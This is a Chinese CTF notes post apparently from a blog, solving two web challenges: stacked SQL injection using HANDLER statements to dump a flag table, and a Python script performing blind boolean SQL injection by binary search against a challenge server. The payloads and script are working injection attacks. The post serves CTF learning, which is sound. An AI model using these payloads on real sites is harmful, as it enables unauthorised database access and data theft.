CTF做题笔记12

最新推荐文章于 2025-12-28 00:20:23 发布

原创最新推荐文章于 2025-12-28 00:20:23 发布 · 531 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#学习 #网络安全 #web安全 #python

笔记专栏收录该内容

45 篇文章

订阅专栏

这篇文章讲述了参与者在CISCN2019华北赛区的一场Web挑战中，通过逆向分析和SQL注入技巧，尝试从旗面（FlagHere）数据库中获取旗子标识符的过程。作者展示了利用字符编码和SQL查询来逐步逼近目标旗子的方法，最终揭示了旗子内容：flag{f559de7b-00a5-4ea5-83da-df44858ee86a}

[GYCTF2020]Blacklist

?inject=1%27

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

?inject=1%27;show%20tables;#

array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}

array(1) {
  [0]=>
  string(8) "FlagHere"
}

array(1) {
  [0]=>
  string(5) "words"
}

?inject=1%27;show%20databases;#

?inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere read next;handler FlagHere close;#
```txt
array(1) {
  [0]=>
  string(42) "flag{f559de7b-00a5-4ea5-83da-df44858ee86a}"
}

[CISCN2019 华北赛区 Day2 Web1]Hack World

import time

import requests

url = "http://9339d90e-0480-4795-b0c8-93b2cfe5af91.node4.buuoj.cn:81/index.php"
playload = {"id": ""}
flag = ""

for x in range(1, 1000):
    low = 32
    high = 127
    mid = (low + high) // 2
    while low < high:
        playload["id"] = "1^(ascii(substr((select(select(flag))from(flag)),{},1))>{})^1".format(x, mid)
        r = requests.post(url, data=playload)
        r.encoding = "utf-8"
        if r.text.find("Hello") != -1:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if mid == 32 or mid == 132:
        break
    flag += chr(mid)
    print(flag)
    time.sleep(1)

if __name__ == '__main__':
    print(flag)